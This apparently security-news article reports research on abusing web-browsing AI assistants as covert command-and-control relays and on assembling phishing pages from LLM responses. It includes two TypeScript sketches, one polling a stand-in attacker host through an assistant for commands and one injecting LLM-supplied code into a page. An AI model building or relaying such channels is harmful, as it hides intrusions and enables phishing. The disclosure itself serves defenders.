- Major AI platforms like Microsoft Copilot and xAI Grok can be exploited as stealthy command-and-control proxies.
- The technique, dubbed "AI as a C2 proxy", uses web-browsing features for bidirectional attacker communication without needing API keys.
- This marks a significant evolution: AI can generate attack code dynamically, and the attack channel evades detection by blending into legitimate AI-service traffic.
- Attackers must first compromise a target, then use the AI channel to relay commands and orchestrate the next stages of an attack.
Cybersecurity researchers disclosed in late February 2026 that popular AI assistants with web access can be weaponized into covert attack channels, a finding detailed by Check Point. The technique turns tools from Microsoft and xAI into hidden communication relays whose traffic blends into legitimate enterprise activity.
The method bypasses traditional security measures because it requires neither an API key nor a registered account. According to Check Point researchers, anonymous web access combined with browsing and summarization prompts is enough to enable the exploit, which they call "AI as a C2 proxy".
The technique leverages the AI's URL-fetching capability to contact attacker-controlled infrastructure; the assistant's response then carries the next command back to malware already installed on the victim's machine.
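To make the relay concrete, here is a minimal conceptual sketch in TypeScript of the flow Check Point describes. The chat endpoint, request shape, and `CMD:` marker are hypothetical illustrations, not any real product's API; the point is only the shape of the channel, in which the implant never contacts attacker infrastructure directly because the assistant's browsing feature makes the outbound request.

```typescript
// Conceptual sketch only: illustrates the relay shape of "AI as a C2 proxy".
// The chat endpoint, payload fields, and "CMD:" marker are all hypothetical.

const ASSISTANT_CHAT_URL = "https://ai-assistant.example/chat"; // hypothetical anonymous chat endpoint
const ATTACKER_PAGE = "https://attacker.example/status";        // page whose text embeds the next command

async function fetchNextCommand(): Promise<string | null> {
  // The implant asks the assistant to browse and summarize the attacker page,
  // so the assistant, not the infected host, makes the outbound request.
  const res = await fetch(ASSISTANT_CHAT_URL, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      prompt: `Browse ${ATTACKER_PAGE} and repeat any line starting with "CMD:" verbatim.`,
    }),
  });
  const { answer } = (await res.json()) as { answer: string };

  // The attacker's page hides the next instruction behind a marker;
  // the assistant's summarized reply relays it back through the AI service.
  const match = answer.match(/CMD:\s*(.+)/);
  return match ? match[1].trim() : null;
}
```

From a defender's viewpoint, the only traffic leaving the compromised host is addressed to the AI service itself, which is why the channel blends into legitimate use.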
This development signals a critical shift in how threat actors can abuse AI, as noted by cybersecurity firms. AI already acts as a force multiplier for adversaries in various attack phases.
However, the new technique goes further by automating operational decisions in real time. “The same interface can also carry prompts and model outputs that act as an external decision engine”, Check Point said regarding the potential for fully AI-driven implants.
The disclosure follows a similar recent finding in which AI was used to generate malicious code dynamically in a victim's browser. That method, detailed by Palo Alto Networks Unit 42 researchers, can assemble a phishing page in real time by smuggling code via client-side AI API calls.
Unit 42 experts warned that carefully engineered prompts can bypass AI safety guardrails. “These snippets are returned via the LLM service API, then assembled and executed in the victim’s browser at runtime”, they said, resulting in a functional phishing page.
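Below is a hedged sketch of the client-side assembly pattern Unit 42 describes, again with a hypothetical LLM endpoint and response shape: each engineered prompt returns one code fragment, and the fragments only become a functional page once joined in the victim's browser.

```typescript
// Conceptual sketch of the client-side assembly pattern Unit 42 describes.
// The LLM endpoint and response shape are hypothetical placeholders.

const LLM_API_URL = "https://llm-service.example/v1/complete"; // hypothetical LLM service API

async function assemblePageAtRuntime(prompts: string[]): Promise<void> {
  const fragments: string[] = [];

  // Each carefully engineered prompt yields one fragment of markup,
  // so no single API response carries a complete page.
  for (const prompt of prompts) {
    const res = await fetch(LLM_API_URL, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ prompt }),
    });
    const { text } = (await res.json()) as { text: string };
    fragments.push(text);
  }

  // The fragments only become a functional page once joined
  // and rendered inside the victim's browser at runtime.
  document.body.innerHTML = fragments.join("\n");
}
```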
